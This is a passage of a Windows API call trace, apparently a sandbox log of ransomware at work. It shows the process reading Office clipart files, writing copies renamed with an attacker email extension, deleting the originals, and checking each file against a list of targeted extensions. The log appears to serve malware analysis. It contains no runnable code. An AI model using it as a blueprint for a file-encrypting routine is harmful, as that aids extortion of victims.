lpNewFilePointer=0x0) returned 1 [0271.693] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.693] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02068_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02068_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0271.693] GetLastError () returned 0x0 [0271.693] ReadFile (in: hFile=0x394, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x9b8, lpOverlapped=0x0) returned 1 [0271.893] WriteFile (in: hFile=0x384, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x9c0, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x9c0, lpOverlapped=0x0) returned 1 [0271.894] ReadFile (in: hFile=0x394, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.894] WriteFile (in: hFile=0x384, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.894] SetEndOfFile (hFile=0x384) returned 1 [0271.894] CloseHandle (hObject=0x384) returned 1 [0271.894] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.894] SetEndOfFile (hFile=0x394) returned 1 [0271.896] CloseHandle (hObject=0x394) returned 1 [0271.896] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02068_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.897] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02068_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02068_.wmf")) returned 1 [0271.897] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02068_.WMF") returned 63 [0271.897] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02068_.WMF") returned 63 [0271.897] lstrlenW (lpString=".doc") returned 4 [0271.897] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.897] lstrlenW (lpString=".docx") returned 5 [0271.897] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.897] lstrlenW (lpString=".pdf") returned 4 [0271.897] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.897] lstrlenW (lpString=".xls") returned 4 [0271.898] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.898] lstrlenW (lpString=".xlsx") returned 5 [0271.898] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.898] lstrlenW (lpString=".ppt") returned 4 [0271.898] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.898] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02068_.WMF") returned 63 [0271.898] lstrlenW (lpString=".zip") returned 4 [0271.898] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.898] lstrlenW (lpString=".rar") returned 4 [0271.898] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.898] lstrlenW (lpString=".bz2") returned 4 [0271.898] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.898] lstrlenW (lpString=".7z") returned 3 [0271.898] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.898] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02068_.WMF") returned 63 [0271.898] lstrlenW (lpString=".dbf") returned 4 [0271.898] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.898] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02068_.WMF") returned 63 [0271.898] lstrlenW (lpString=".1cd") returned 4 [0271.898] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.898] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02068_.WMF") returned 63 [0271.898] lstrlenW (lpString=".jpg") returned 4 [0271.898] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.898] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02068_.WMF") returned 63 [0271.898] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02068_.WMF") returned 63 [0271.898] lstrlenW (lpString=".doc") returned 4 [0271.898] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.898] lstrlenW (lpString=".docx") returned 5 [0271.898] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.898] lstrlenW (lpString=".pdf") returned 4 [0271.898] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.899] lstrlenW (lpString=".xls") returned 4 [0271.899] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.899] lstrlenW (lpString=".xlsx") returned 5 [0271.899] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.899] lstrlenW (lpString=".ppt") returned 4 [0271.899] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.899] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02068_.WMF") returned 63 [0271.899] lstrlenW (lpString=".zip") returned 4 [0271.899] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.899] lstrlenW (lpString=".rar") returned 4 [0271.899] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.899] lstrlenW (lpString=".bz2") returned 4 [0271.899] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.899] lstrlenW (lpString=".7z") returned 3 [0271.899] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.899] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02068_.WMF") returned 63 [0271.899] lstrlenW (lpString=".dbf") returned 4 [0271.899] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.899] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02068_.WMF") returned 63 [0271.899] lstrlenW (lpString=".1cd") returned 4 [0271.899] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.899] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02068_.WMF") returned 63 [0271.899] lstrlenW (lpString=".jpg") returned 4 [0271.899] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.899] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.899] lstrlenW (lpString="HH00057_.WMF") returned 12 [0271.899] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00057_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00057_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0271.917] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=3764) returned 1 [0271.917] CloseHandle (hObject=0x390) returned 1 [0271.917] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00057_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00057_.wmf")) returned 0x20 [0271.917] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00057_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00057_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.917] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00057_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00057_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0271.917] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.917] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.917] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00057_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00057_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a8 [0271.918] GetLastError () returned 0x0 [0271.918] ReadFile (in: hFile=0x390, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0xeb4, lpOverlapped=0x0) returned 1 [0271.928] WriteFile (in: hFile=0x2a8, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec0, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec0, lpOverlapped=0x0) returned 1 [0271.929] ReadFile (in: hFile=0x390, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.929] WriteFile (in: hFile=0x2a8, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.929] SetEndOfFile (hFile=0x2a8) returned 1 [0271.940] CloseHandle (hObject=0x2a8) returned 1 [0271.940] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.940] SetEndOfFile (hFile=0x390) returned 1 [0271.942] CloseHandle (hObject=0x390) returned 1 [0271.942] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00057_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.962] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00057_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00057_.wmf")) returned 1 [0271.963] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00057_.WMF") returned 63 [0271.963] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00057_.WMF") returned 63 [0271.963] lstrlenW (lpString=".doc") returned 4 [0271.963] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.963] lstrlenW (lpString=".docx") returned 5 [0271.963] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.963] lstrlenW (lpString=".pdf") returned 4 [0271.963] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.963] lstrlenW (lpString=".xls") returned 4 [0271.963] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.963] lstrlenW (lpString=".xlsx") returned 5 [0271.963] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.963] lstrlenW (lpString=".ppt") returned 4 [0271.963] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.963] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00057_.WMF") returned 63 [0271.963] lstrlenW (lpString=".zip") returned 4 [0271.963] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.963] lstrlenW (lpString=".rar") returned 4 [0271.963] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.963] lstrlenW (lpString=".bz2") returned 4 [0271.963] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.963] lstrlenW (lpString=".7z") returned 3 [0271.963] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.963] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00057_.WMF") returned 63 [0271.963] lstrlenW (lpString=".dbf") returned 4 [0271.964] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.964] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00057_.WMF") returned 63 [0271.964] lstrlenW (lpString=".1cd") returned 4 [0271.964] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.964] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00057_.WMF") returned 63 [0271.964] lstrlenW (lpString=".jpg") returned 4 [0271.964] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.964] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00057_.WMF") returned 63 [0271.964] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00057_.WMF") returned 63 [0271.964] lstrlenW (lpString=".doc") returned 4 [0271.964] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.964] lstrlenW (lpString=".docx") returned 5 [0271.964] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.964] lstrlenW (lpString=".pdf") returned 4 [0271.964] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.964] lstrlenW (lpString=".xls") returned 4 [0271.964] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.964] lstrlenW (lpString=".xlsx") returned 5 [0271.964] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.964] lstrlenW (lpString=".ppt") returned 4 [0271.964] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.964] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00057_.WMF") returned 63 [0271.964] lstrlenW (lpString=".zip") returned 4 [0271.964] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.964] lstrlenW (lpString=".rar") returned 4 [0271.965] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.965] lstrlenW (lpString=".bz2") returned 4 [0271.965] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.965] lstrlenW (lpString=".7z") returned 3 [0271.965] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00057_.WMF") returned 63 [0271.965] lstrlenW (lpString=".dbf") returned 4 [0271.965] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00057_.WMF") returned 63 [0271.965] lstrlenW (lpString=".1cd") returned 4 [0271.965] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00057_.WMF") returned 63 [0271.965] lstrlenW (lpString=".jpg") returned 4 [0271.965] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.965] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.965] lstrlenW (lpString="HH00235_.WMF") returned 12 [0271.965] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00235_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00235_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0272.136] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=1026) returned 1 [0272.136] CloseHandle (hObject=0x39c) returned 1 [0272.136] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00235_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00235_.wmf")) returned 0x20 [0272.143] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00235_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00235_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.144] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00235_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00235_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0272.144] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.144] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.144] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00235_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00235_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a8 [0272.145] GetLastError () returned 0x0 [0272.145] ReadFile (in: hFile=0x390, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x402, lpOverlapped=0x0) returned 1 [0272.157] WriteFile (in: hFile=0x2a8, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x410, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x410, lpOverlapped=0x0) returned 1 [0272.158] ReadFile (in: hFile=0x390, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.158] WriteFile (in: hFile=0x2a8, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0272.158] SetEndOfFile (hFile=0x2a8) returned 1 [0272.158] CloseHandle (hObject=0x2a8) returned 1 [0272.158] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.158] SetEndOfFile (hFile=0x390) returned 1 [0272.160] CloseHandle (hObject=0x390) returned 1 [0272.160] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00235_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0272.239] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00235_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00235_.wmf")) returned 1 [0272.242] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00235_.WMF") returned 63 [0272.242] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00235_.WMF") returned 63 [0272.242] lstrlenW (lpString=".doc") returned 4 [0272.242] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.243] lstrlenW (lpString=".docx") returned 5 [0272.243] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.243] lstrlenW (lpString=".pdf") returned 4 [0272.243] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.243] lstrlenW (lpString=".xls") returned 4 [0272.243] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.243] lstrlenW (lpString=".xlsx") returned 5 [0272.243] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.243] lstrlenW (lpString=".ppt") returned 4 [0272.243] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.243] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00235_.WMF") returned 63 [0272.243] lstrlenW (lpString=".zip") returned 4 [0272.243] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.243] lstrlenW (lpString=".rar") returned 4 [0272.243] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.243] lstrlenW (lpString=".bz2") returned 4 [0272.243] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.243] lstrlenW (lpString=".7z") returned 3 [0272.243] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.243] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00235_.WMF") returned 63 [0272.243] lstrlenW (lpString=".dbf") returned 4 [0272.243] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.243] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00235_.WMF") returned 63 [0272.243] lstrlenW (lpString=".1cd") returned 4 [0272.243] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.243] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00235_.WMF") returned 63 [0272.243] lstrlenW (lpString=".jpg") returned 4 [0272.243] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.243] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00235_.WMF") returned 63 [0272.243] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00235_.WMF") returned 63 [0272.244] lstrlenW (lpString=".doc") returned 4 [0272.244] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.244] lstrlenW (lpString=".docx") returned 5 [0272.244] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.244] lstrlenW (lpString=".pdf") returned 4 [0272.244] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.244] lstrlenW (lpString=".xls") returned 4 [0272.244] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.244] lstrlenW (lpString=".xlsx") returned 5 [0272.244] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.244] lstrlenW (lpString=".ppt") returned 4 [0272.244] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.244] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00235_.WMF") returned 63 [0272.244] lstrlenW (lpString=".zip") returned 4 [0272.244] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.244] lstrlenW (lpString=".rar") returned 4 [0272.244] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.244] lstrlenW (lpString=".bz2") returned 4 [0272.244] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.244] lstrlenW (lpString=".7z") returned 3 [0272.244] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.244] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00235_.WMF") returned 63 [0272.244] lstrlenW (lpString=".dbf") returned 4 [0272.244] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.244] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00235_.WMF") returned 63 [0272.244] lstrlenW (lpString=".1cd") returned 4 [0272.244] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.244] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00235_.WMF") returned 63 [0272.244] lstrlenW (lpString=".jpg") returned 4 [0272.244] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.245] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0272.245] lstrlenW (lpString="HH00513_.WMF") returned 12 [0272.245] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00513_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00513_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0272.252] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=818) returned 1 [0272.252] CloseHandle (hObject=0x3b4) returned 1 [0272.253] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00513_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00513_.wmf")) returned 0x20 [0272.253] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00513_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00513_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.253] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00513_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00513_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0272.253] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.253] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.253] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00513_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00513_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0272.253] GetLastError () returned 0x0 [0272.253] 